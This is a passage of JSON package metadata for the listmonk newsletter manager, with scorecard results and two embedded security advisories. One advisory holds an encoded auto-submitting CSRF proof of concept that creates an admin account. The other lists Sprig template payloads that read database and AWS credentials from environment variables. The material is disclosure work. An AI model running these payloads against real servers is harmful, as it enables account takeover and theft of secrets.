value=\"\u0026#123;\u0026#123;\u0026#32;template\u0026#32;\u0026quot;content\u0026quot;\u0026#32;\u0026#46;\u0026#32;\u0026#125;\u0026#125;\u0026#13;\u0026#10;\u0026#13;\u0026#10;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026lt;script\u0026gt;\u0026#13;\u0026#10;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;function\u0026#32;submitRequest\u0026#40;\u0026#41;\u0026#13;\u0026#10;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#123;\u0026#13;\u0026#10;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;var\u0026#32;xhr\u0026#32;\u0026#61;\u0026#32;new\u0026#32;XMLHttpRequest\u0026#40;\u0026#41;\u0026#59;\u0026#13;\u0026#10;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;xhr\u0026#46;open\u0026#40;\u0026quot;POST\u0026quot;\u0026#44;\u0026#32;\u0026quot;https\u0026#58;\u0026#92;\u0026#47;\u0026#92;\u0026#47;10\u0026#46;100\u0026#46;132\u0026#46;47\u0026#92;\u0026#47;api\u0026#92;\u0026#47;users\u0026quot;\u0026#44;\u0026#32;true\u0026#41;\u0026#59;\u0026#13;\u0026#10;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;xhr\u0026#46;setRequestHeader\u0026#40;\u0026quot;Content\u0026#45;Type\u0026quot;\u0026#44;\u0026#32;\u0026quot;application\u0026#92;\u0026#47;json\u0026quot;\u0026#41;\u0026#59;\u0026#13;\u0026#10;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;xhr\u0026#46;withCredentials\u0026#32;\u0026#61;\u0026#32;true\u0026#59;\u0026#13;\u0026#10;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;var\u0026#32;body\u0026#32;\u0026#61;\u0026#32;\u0026quot;\u0026#123;\u0026#92;\u0026quot;username\u0026#92;\u0026quot;\u0026#58;\u0026#92;\u0026quot;testuser4\u0026#92;\u0026quot;\u0026#44;\u0026#92;\u0026quot;email\u0026#92;\u0026quot;\u0026#58;\u0026#92;\u0026quot;test3\u0026#64;test\u0026#46;com\u0026#92;\u0026quot;\u0026#44;\u0026#92;\u0026quot;name\u0026#92;\u0026quot;\u0026#58;\u0026#92;\u0026quot;testuser4\u0026#92;\u0026quot;\u0026#44;\u0026#92;\u0026quot;password\u0026#92;\u0026quot;\u0026#58;\u0026#92;\u0026quot;Test12345\u0026#92;\u0026quot;\u0026#44;\u0026#92;\u0026quot;passwordLogin\u0026#92;\u0026quot;\u0026#58;true\u0026#44;\u0026#92;\u0026quot;type\u0026#92;\u0026quot;\u0026#58;\u0026#92;\u0026quot;user\u0026#92;\u0026quot;\u0026#44;\u0026#92;\u0026quot;status\u0026#92;\u0026quot;\u0026#58;\u0026#92;\u0026quot;enabled\u0026#92;\u0026quot;\u0026#44;\u0026#92;\u0026quot;listRoleId\u0026#92;\u0026quot;\u0026#58;\u0026#92;\u0026quot;\u0026#92;\u0026quot;\u0026#44;\u0026#92;\u0026quot;userRoleId\u0026#92;\u0026quot;\u0026#58;1\u0026#44;\u0026#92;\u0026quot;password2\u0026#92;\u0026quot;\u0026#58;\u0026#92;\u0026quot;Test12345\u0026#92;\u0026quot;\u0026#44;\u0026#92;\u0026quot;password\u0026#95;login\u0026#92;\u0026quot;\u0026#58;true\u0026#44;\u0026#92;\u0026quot;user\u0026#95;role\u0026#95;id\u0026#92;\u0026quot;\u0026#58;1\u0026#44;\u0026#92;\u0026quot;list\u0026#95;role\u0026#95;id\u0026#92;\u0026quot;\u0026#58;null\u0026#125;\u0026quot;\u0026#59;\u0026#13;\u0026#10;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;var\u0026#32;aBody\u0026#32;\u0026#61;\u0026#32;new\u0026#32;Uint8Array\u0026#40;body\u0026#46;length\u0026#41;\u0026#59;\u0026#13;\u0026#10;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;for\u0026#32;\u0026#40;var\u0026#32;i\u0026#32;\u0026#61;\u0026#32;0\u0026#59;\u0026#32;i\u0026#32;\u0026lt;\u0026#32;aBody\u0026#46;length\u0026#59;\u0026#32;i\u0026#43;\u0026#43;\u0026#41;\u0026#13;\u0026#10;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;aBody\u0026#91;i\u0026#93;\u0026#32;\u0026#61;\u0026#32;body\u0026#46;charCodeAt\u0026#40;i\u0026#41;\u0026#59;\u0026#32;\u0026#13;\u0026#10;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;xhr\u0026#46;send\u0026#40;new\u0026#32;Blob\u0026#40;\u0026#91;aBody\u0026#93;\u0026#41;\u0026#41;\u0026#59;\u0026#13;\u0026#10;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#125;\u0026#13;\u0026#10;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026#32;submitRequest\u0026#40;\u0026#41;\u0026#59;\u0026#13;\u0026#10;\u0026#32;\u0026#32;\u0026#32;\u0026#32;\u0026lt;\u0026#47;script\u0026gt;\" /\u003e\n      \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n    \u003c/form\u003e\n    \u003cscript\u003e\n      document.forms[0].submit();\n    \u003c/script\u003e\n  \u003c/body\u003e\n\u003c/html\u003e\n\n\n```\n\n### Impact\nAdmin account creation","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-09-09T20:42:32.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.6,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N","references":["https://github.com/knadh/listmonk/security/advisories/GHSA-rf24-wg77-gq7w","https://nvd.nist.gov/vuln/detail/CVE-2025-58430","https://github.com/advisories/GHSA-rf24-wg77-gq7w"],"source_kind":"github","identifiers":["GHSA-rf24-wg77-gq7w","CVE-2025-58430"],"repository_url":"https://github.com/knadh/listmonk","blast_radius":0.0,"created_at":"2025-09-09T21:10:29.438Z","updated_at":"2026-08-28T13:05:13.296Z","epss_percentage":0.00136,"epss_percentile":0.03281,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yZjI0LXdnNzctZ3E3d84ABL5J","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1yZjI0LXdnNzctZ3E3d84ABL5J","packages":[{"ecosystem":"go","package_name":"github.com/knadh/listmonk","versions":[{"first_patched_version":null,"vulnerable_version_range":"\u003c= 1.1.0"}],"purl":"pkg:go/github.com%2Fknadh%2Flistmonk"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yZjI0LXdnNzctZ3E3d84ABL5J/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1qYzdnLXgyOGYtM3YzaM4ABIyG","url":"https://github.com/advisories/GHSA-jc7g-x28f-3v3h","title":"listmonk's Sprig template Injection vulnerability leads to reading of Environment Variable for low privilege user","description":"### Summary\nThe `env` and `expandenv` template functions which is enabled by default in [Sprig](https://masterminds.github.io/sprig/) enables capturing of env variables on the host. While this may not be a problem on single-user (super admin) installations, on multi-user installations, this allows non-super-admin users with campaign or template permissions to use the `{{ env }}` template expression to capture sensitive environment variables.\n\n**Upgrade to [v5.0.2](https://github.com/knadh/listmonk/releases/tag/v5.0.2)** to mitigate.\n\n---------\n\n# Demonstration\n\n### Description\nA critical template injection vulnerability exists in Listmonk's campaign preview functionality that allows authenticated users with minimal privileges (campaigns:get \u0026 campaigns:get_all) to extract sensitive system data, including database credentials, SMTP passwords, and admin credentials due to some dangerous function being allowed.\n\n### Proof of Concept\n\n- Create a user and give him `campaigns:get` and `campaigns:get_all` privileges\n\n![image](https://github.com/user-attachments/assets/05333695-14d9-498e-9f73-2137d6eca55b)\n\n- Now login with that user, go to any campaign, go the Content section and here lies the vulnerability, we're able to execute template content which allows us to get environment variables, execute Sprig functions...\n\n- Now in the text field you can input the following and press Preview:\n```\n{{ env \"AWS_KEY\" }}\n{{ env \"LISTMONK_db__user\" }}\n{{ env \"LISTMONK_db__password\" }}\n````\n\n![image](https://github.com/user-attachments/assets/ac963f54-5982-47d4-99d0-59030917f548)\n\n# Preview:\n\n![image](https://github.com/user-attachments/assets/99558ca4-81c6-4e1a-bd0d-6bc57830f4d0)\n\nI had the AWS_KEY variable set like that to confirm the vulnerability:\n\n![image](https://github.com/user-attachments/assets/16382998-2402-436a-9bb0-db09fb13dd79)\n\n### Impact\n\n- Through these environment variables the attacker can access, they can fully compromise the database, cloud accounts, admin credentials, and more depending on what was setup leading to total system takeover and data breach.\n\n### Suggested Fix\n\n- Blacklist some function for templates like env, expandEnv and fail as they can be used to leak environment variables which leads to a full takeover.","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2025-06-09T13:09:24.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.0,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H","references":["https://github.com/knadh/listmonk/security/advisories/GHSA-jc7g-x28f-3v3h","https://github.com/knadh/listmonk/commit/d27d2c32cf3af2d0b24e29ea5a686ba149b49b3e","https://github.com/knadh/listmonk/releases/tag/v5.0.2","https://nvd.nist.gov/vuln/detail/CVE-2025-49136","https://github.com/advisories/GHSA-jc7g-x28f-3v3h"],"source_kind":"github","identifiers":["GHSA-jc7g-x28f-3v3h","CVE-2025-49136"],"repository_url":"https://github.com/knadh/listmonk","blast_radius":0.0,"created_at":"2025-06-09T14:09:23.698Z","updated_at":"2026-09-01T18:05:57.426Z","epss_percentage":0.01436,"epss_percentile":0.71234,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qYzdnLXgyOGYtM3YzaM4ABIyG","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1qYzdnLXgyOGYtM3YzaM4ABIyG","packages":[{"ecosystem":"go","package_name":"github.com/knadh/listmonk","versions":[{"first_patched_version":"5.0.2","vulnerable_version_range":"\u003e= 4.0.0, \u003c 5.0.2"}],"purl":"pkg:go/github.com%2Fknadh%2Flistmonk"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qYzdnLXgyOGYtM3YzaM4ABIyG/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/knadh/listmonk","docker_dependents_count":5,"docker_downloads_count":7956,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/knadh/listmonk","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/knadh/listmonk/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-28T07:01:54.025Z","issues_count":941,"pull_requests_count":437,"avg_time_to_close_issue":6062913.752307693,"avg_time_to_close_pull_request":1085166.282051282,"issues_closed_count":650,"pull_requests_closed_count":351,"pull_request_authors_count":193,"issue_authors_count":631,"avg_comments_per_issue":2.757704569606801,"avg_comments_per_pull_request":1.196796338672769,"merged_pull_requests_count":242,"bot_issues_count":0,"bot_pull_requests_count":73,"past_year_issues_count":100,"past_year_pull_requests_count":79,"past_year_avg_time_to_close_issue":3732101.7,"past_year_avg_time_to_close_pull_request":605370.9818181818,"past_year_issues_closed_count":40,"past_year_pull_requests_closed_count":55,"past_year_pull_request_authors_count":49,"past_year_issue_authors_count":83,"past_year_avg_comments_per_issue":1.78,"past_year_avg_comments_per_pull_request":1.3037974683544304,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":21,"past_year_merged_pull_requests_count":24,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/issues","maintainers":[{"login":"knadh","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knadh"},{"login":"mr-karan","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mr-karan"},{"login":"rhnvrm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rhnvrm"}],"active_maintainers":[{"login":"knadh","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knadh"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fknadh%2Flistmonk/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fknadh%2Flistmonk/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fknadh%2Flistmonk/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fknadh%2Flistmonk/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fknadh%2Flistmonk/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fknadh%2Flistmonk/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2282188,"maintainers_count":0,"namespaces_count":839573,"keywords_count":126245,"github":"golang","metadata":{"funded_packages_count":69842,"sync_missing_packages_cursor":{"timestamp":"2026-08-17T00:00:58.969562Z","path":"github.com/Tektoncd/operator","version":"v0.78.0"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-09-01T05:03:01.892Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":13282137,"name":"listmonk","ecosystem":"nixpkgs","description":"High performance, self-hosted, newsletter and mailing list manager with a modern dashboard.","homepage":"https://github.com/knadh/listmonk","licenses":"AGPL-3.0","normalized_licenses":["AGPL-3.0"],"repository_url":"https://github.com/knadh/listmonk","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2026-02-02T05:29:36.200Z","latest_release_published_at":"2026-02-02T05:29:36.200Z","latest_release_number":"2.5.1","last_synced_at":"2026-03-08T02:47:29.593Z","created_at":"2026-02-02T05:29:34.996Z","updated_at":"2026-08-29T20:33:54.723Z","registry_url":"https://search.nixos.org/packages?channel=23.11\u0026query=listmonk","install_command":"nix-env -iA nixpkgs.listmonk","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-23.11/pkgs/servers/mail/listmonk/default.nix#L58","metadata":{"nix_attribute":"listmonk-2.5.1","position":"pkgs/servers/mail/listmonk/default.nix:58","platforms":["x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin","aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux"],"broken":false,"insecure":false,"unfree":false,"outputs":["out"]},"repo_metadata":{"id":37385001,"uuid":"193833307","full_name":"knadh/listmonk","owner":"knadh","description":"High performance, self-hosted, newsletter and mailing list manager with a modern dashboard. Single binary app.","archived":false,"fork":false,"pushed_at":"2026-08-22T08:24:51.000Z","size":52262,"stargazers_count":23109,"open_issues_count":109,"forks_count":2551,"subscribers_count":142,"default_branch":"master","last_synced_at":"2026-08-25T13:49:36.001Z","etag":null,"topics":["campaign","campaign-management","email-marketing","email-subscription","listmonk","mailing-list","newsletter","newsletter-management","newsletter-software","self-hosted","sms-gateway","smtp","transactional-emails"],"latest_commit_sha":null,"homepage":"https://listmonk.app","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"agpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/knadh.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2019-06-26T05:08:39.000Z","updated_at":"2026-08-25T13:22:53.000Z","dependencies_parsed_at":"2022-07-12T16:17:41.274Z","dependency_job_id":"71e3fe47-ce35-4f28-872a-148e180d6c82","html_url":"https://github.com/knadh/listmonk","commit_stats":null,"previous_names":[],"tags_count":42,"template":false,"template_full_name":null,"purl":"pkg:github/knadh/listmonk","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/knadh","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/sbom","scorecard":{"id":161421,"data":{"date":"2025-08-11","repo":{"name":"github.com/knadh/listmonk","commit":"38387d007926c2fbc3e0daaf15970dd3f5581f43"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.3,"checks":[{"name":"Code-Review","score":4,"reason":"Found 13/27 approved changesets -- score normalized to 4","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 6 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/build-sanity.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/github-pages.yml:12","Warn: no topLevel permission defined: .github/workflows/issues.yml:1","Warn: topLevel permissions set to 'write-all': .github/workflows/release.yml:8"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: GNU Affero General Public License v3.0: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/release.yml:11"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/build-sanity.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/build-sanity.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/build-sanity.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/build-sanity.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/github-pages.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/github-pages.yml:23: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/github-pages.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/github-pages.yml:48: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/github-pages.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/issues.yml:11: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/issues.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yml:23: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yml:49: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: containerImage not pinned by hash: Dockerfile:1: pin your Docker image by updating alpine:latest to alpine:latest@sha256:4bcff63911fcb4448bd4fdacec207030997caf25e9bea4045fa6c8c44de311d1","Warn: containerImage not pinned by hash: dev/app.Dockerfile:1","Warn: containerImage not pinned by hash: dev/app.Dockerfile:3","Warn: pipCommand not pinned by hash: .github/workflows/github-pages.yml:27","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   7 third-party GitHubAction dependencies pinned","Info:   0 out of   3 containerImage dependencies pinned","Info:   0 out of   1 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v5.0.3 not signed: https://api.github.com/repos/knadh/listmonk/releases/230297465","Warn: release artifact v5.0.2 not signed: https://api.github.com/repos/knadh/listmonk/releases/223848166","Warn: release artifact v5.0.1 not signed: https://api.github.com/repos/knadh/listmonk/releases/220844848","Warn: release artifact v5.0.0 not signed: https://api.github.com/repos/knadh/listmonk/releases/215270409","Warn: release artifact v4.1.0 not signed: https://api.github.com/repos/knadh/listmonk/releases/184955432","Warn: release artifact v5.0.3 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/230297465","Warn: release artifact v5.0.2 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/223848166","Warn: release artifact v5.0.1 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/220844848","Warn: release artifact v5.0.0 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/215270409","Warn: release artifact v4.1.0 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/184955432"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"SAST","score":2,"reason":"SAST tool is not run on all commits -- score normalized to 2","details":["Warn: 4 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"13 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-w455-mfq9-hf74","Warn: Project is vulnerable to: GHSA-mwcw-c2x4-8c55","Warn: Project is vulnerable to: GHSA-859w-5945-r5v3","Warn: Project is vulnerable to: GHSA-9hcv-j9pv-qmph","Warn: Project is vulnerable to: GHSA-w9jx-4g6g-rp7x","Warn: Project is vulnerable to: GHSA-438c-3975-5x3f","Warn: Project is vulnerable to: GHSA-5359-pvf2-pw78","Warn: Project is vulnerable to: GHSA-5j4c-8p2g-v4jx","Warn: Project is vulnerable to: GHSA-g3ch-rx76-35fx","Warn: Project is vulnerable to: GHSA-q7pp-wcgr-pffx"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-16T13:33:46.690Z","repository_id":37385001,"created_at":"2025-08-16T13:33:46.690Z","updated_at":"2025-08-16T13:33:46.690Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36904960,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-25T02:00:06.831Z","response_time":104,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"knadh","name":"Kailash Nadh","uuid":"547147","kind":"user","description":"Hobbyist developer | CTO @zerodha | Volunteer @fossunited @rainmatter-foundation  @indic-archive 